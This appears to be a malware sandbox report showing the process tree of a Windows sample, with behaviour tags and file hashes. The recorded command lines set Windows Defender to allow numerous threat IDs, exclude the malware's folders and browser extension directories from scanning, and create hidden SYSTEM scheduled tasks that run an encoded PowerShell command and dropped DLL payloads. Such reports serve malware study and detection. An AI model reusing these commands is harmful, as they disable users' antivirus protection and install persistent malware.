C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2980
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4032
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwYHmiwJWhATC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwYHmiwJWhATC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KtOMBNNCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KtOMBNNCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OsumLTlUUhuU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OsumLTlUUhuU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dbQdUPaXiQxCqjpiquR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dbQdUPaXiQxCqjpiquR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kfPhUuJGKgUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kfPhUuJGKgUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\zoQBiavzoqGoJDVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\zoQBiavzoqGoJDVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\yeQxYYgqRyYPtFDwH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\yeQxYYgqRyYPtFDwH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\FoedXmhglzNTfZvK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\FoedXmhglzNTfZvK\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwYHmiwJWhATC" /t REG_DWORD /d 0 /reg:323⤵PID:2736
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwYHmiwJWhATC" /t REG_DWORD /d 0 /reg:324⤵PID:4916
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwYHmiwJWhATC" /t REG_DWORD /d 0 /reg:643⤵PID:5068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KtOMBNNCU" /t REG_DWORD /d 0 /reg:323⤵PID:1020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KtOMBNNCU" /t REG_DWORD /d 0 /reg:643⤵PID:5016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OsumLTlUUhuU2" /t REG_DWORD /d 0 /reg:323⤵PID:816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OsumLTlUUhuU2" /t REG_DWORD /d 0 /reg:643⤵PID:2128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dbQdUPaXiQxCqjpiquR" /t REG_DWORD /d 0 /reg:323⤵PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dbQdUPaXiQxCqjpiquR" /t REG_DWORD /d 0 /reg:643⤵PID:1128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kfPhUuJGKgUn" /t REG_DWORD /d 0 /reg:323⤵PID:2192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kfPhUuJGKgUn" /t REG_DWORD /d 0 /reg:643⤵PID:2144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\zoQBiavzoqGoJDVB /t REG_DWORD /d 0 /reg:323⤵PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\zoQBiavzoqGoJDVB /t REG_DWORD /d 0 /reg:643⤵PID:3528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\yeQxYYgqRyYPtFDwH /t REG_DWORD /d 0 /reg:323⤵PID:3688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\yeQxYYgqRyYPtFDwH /t REG_DWORD /d 0 /reg:643⤵PID:4724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\FoedXmhglzNTfZvK /t REG_DWORD /d 0 /reg:323⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\FoedXmhglzNTfZvK /t REG_DWORD /d 0 /reg:643⤵PID:1484
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grNhGriOQ" /SC once /ST 17:33:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grNhGriOQ"2⤵PID:4024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grNhGriOQ"2⤵PID:4156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jGXpWsmIvmguXvRXu" /SC once /ST 00:03:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\FoedXmhglzNTfZvK\qszBCIONplZrdxX\EaIfGtk.exe\" iR /mXsite_idUsR 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4716
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jGXpWsmIvmguXvRXu"2⤵PID:3636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1720
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1228
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1704
-
C:\Windows\Temp\FoedXmhglzNTfZvK\qszBCIONplZrdxX\EaIfGtk.exeC:\Windows\Temp\FoedXmhglzNTfZvK\qszBCIONplZrdxX\EaIfGtk.exe iR /mXsite_idUsR 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3252 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bjeZIAkmpWQsLhKMUx"2⤵PID:3924
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1064
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1904
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1568
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KtOMBNNCU\QwDdTd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HmubaeLvYeTNQNs" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HmubaeLvYeTNQNs2" /F /xml "C:\Program Files (x86)\KtOMBNNCU\uOHkTgU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "HmubaeLvYeTNQNs"2⤵PID:2868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HmubaeLvYeTNQNs"2⤵PID:4820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NnHfNMEcMVRwKw" /F /xml "C:\Program Files (x86)\OsumLTlUUhuU2\nHKLToe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dOobPTuNSbpVc2" /F /xml "C:\ProgramData\zoQBiavzoqGoJDVB\xoDDAbu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rQCIXpFIPRuFMyDnB2" /F /xml "C:\Program Files (x86)\dbQdUPaXiQxCqjpiquR\YPnqTqG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fQxAgkvjBgRcmEwFaqs2" /F /xml "C:\Program Files (x86)\HwYHmiwJWhATC\vWLXDNg.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DDsMfHqDUIqhbhqNv" /SC once /ST 01:32:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\FoedXmhglzNTfZvK\sGKFUQzr\SgWEtni.dll\",#1 /Fssite_idWEG 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "DDsMfHqDUIqhbhqNv"2⤵PID:2996
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\FoedXmhglzNTfZvK\sGKFUQzr\SgWEtni.dll",#1 /Fssite_idWEG 3851181⤵PID:3316
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\FoedXmhglzNTfZvK\sGKFUQzr\SgWEtni.dll",#1 /Fssite_idWEG 3851182⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:1668
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e93ed23a8e953beb1ae3cc8a34d5616d
SHA1533600f2d2105afa2118ddb17090b4554a0e5654
SHA25648b545546ddf6a502d57e02773d5f1f952adf9f8b89ad8c9d7f199775332b1fe
SHA51291c1e157e0e44eb2cff69687085b4be777c549943c906b001108bc2657738202174fe41efa2faac381a1cd8d96d7d1d90569685d459e4077d8e37d41b2884687
-
Filesize
2KB
